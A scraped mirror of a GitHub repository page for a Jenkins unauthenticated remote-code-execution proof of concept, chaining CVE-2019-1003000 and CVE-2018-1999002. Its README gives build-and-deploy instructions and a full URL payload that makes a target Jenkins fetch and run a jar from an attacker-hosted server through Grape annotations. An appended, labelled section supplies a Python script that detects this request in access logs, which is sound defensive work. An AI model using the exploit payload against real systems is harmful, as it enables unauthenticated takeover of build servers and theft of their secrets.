Jenkins RCE PoC. From unauthenticated user to remote code execution (Chaining CV...

 5 years ago
source link: https://www.tuicool.com/articles/hit/rIfAjeM

Jenkins RCE PoC. From unauthenticated user to remote code execution - it's a hacker's dream! (Chaining CVE-2019-1003000, CVE-2018-1999002, and more)

exploit jenkins rce orangetw unauthenticated hacking


petercunha Update README.txt

Latest commit 106973c Feb 20, 2019

Name                    Latest commit message   Commit time
code                    Initial commit          Feb 19, 2019
www/package/payload/1   Initial commit          Feb 19, 2019
README.txt              Update README.txt       Feb 20, 2019
build.sh                Initial commit          Feb 19, 2019

README.txt

JENKINS UNAUTHENTICATED REMOTE CODE EXECUTION
---------------------------------------------

Exploit compiled by me, but full credits for exploit discovery and exploit chaining go to Orange Tsai (orange.tw).

Read his write-ups on this exploit here -
Part 1: https://blog.orange.tw/2019/01/hacking-jenkins-part-1-play-with-dynamic-routing.html
Part 2: http://blog.orange.tw/2019/02/abusing-meta-programming-for-unauthenticated-rce.html
His GitHub: https://github.com/orangetw


INSTRUCTIONS:
-------------
- Edit code/Payload.java to your specifications, then run build.sh to generate a jar and copy it to the web folder.
- Once that is finished, copy the inner contents of www/ to a webserver.
- In the URL payload, replace <TARGET HOST> with the hostname of the server, and <EXPLOIT HOST> with the hostname of where you uploaded your files.


URL Payload:
------------
http://<TARGET HOST>/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile
?value=
@GrabConfig(disableChecksums=true)%0a
@GrabResolver(name='payload', root='http://<EXPLOIT HOST>')%0a
@Grab(group='package', module='payload', version='1')%0a
import Payload;
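
Detection note (added example, not part of the original README or of Orange Tsai's write-ups): the request shape above can be matched in Jenkins or reverse-proxy access logs by looking for a checkScriptCompile form-validation call whose value parameter carries Grape annotations. The sketch assumes combined-format access logs; the log lines, addresses and host names in it are constructed.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Client address and request target from a combined-format access log line.
REQUEST_RE = re.compile(r'^(?P<src>\S+) .*?"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')
# Grape annotations, as used in the README's URL payload.
GRAPE_RE = re.compile(r"@Grab(?:Config|Resolver)?\b")
# root= argument of @GrabResolver: where the controller was told to fetch from.
ROOT_RE = re.compile(r"@GrabResolver\s*\([^)]*?root\s*=\s*['\"]([^'\"]+)['\"]")

# Constructed sample log lines (documentation addresses, placeholder hosts).
SAMPLE_LOG = [
    '203.0.113.7 - - [20/Feb/2019:10:00:00 +0000] "GET /securityRealm/user/admin/'
    'descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/'
    'checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a'
    '@GrabResolver(name=%27payload%27,%20root=%27http://files.example.invalid%27)%0a'
    '@Grab(group=%27package%27,%20module=%27payload%27,%20version=%271%27)%0a'
    'import%20Payload%3B HTTP/1.1" 200 40',
    '198.51.100.4 - alice [20/Feb/2019:10:01:00 +0000] "GET /job/build/descriptorByName/'
    'org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile'
    '?value=node%20%7B%20echo%20%27hi%27%20%7D HTTP/1.1" 200 2',
    '198.51.100.4 - alice [20/Feb/2019:10:02:00 +0000] "GET /login HTTP/1.1" 200 900',
]


def inspect(line):
    """Return a finding dict if the line matches the README's request shape, else None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    path = unquote(url.path).rstrip("/")
    if "/descriptorByName/" not in path or not path.endswith("/checkScriptCompile"):
        return None
    script = "\n".join(v for k, v in parse_qsl(url.query) if k == "value")
    if not GRAPE_RE.search(script):
        return None  # ordinary form validation of a pipeline script
    root = ROOT_RE.search(script)
    return {
        "source": m.group("src"),
        "via_security_realm": path.startswith("/securityRealm/"),
        "resolver_root": root.group(1) if root else None,
    }


def scan(lines):
    """Run inspect() over an iterable of log lines and keep the findings."""
    return [f for f in map(inspect, lines) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The resolver_root value in a finding is the host to look for in the controller's outbound proxy or DNS logs, since a fetch from it indicates the annotation was processed rather than rejected.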
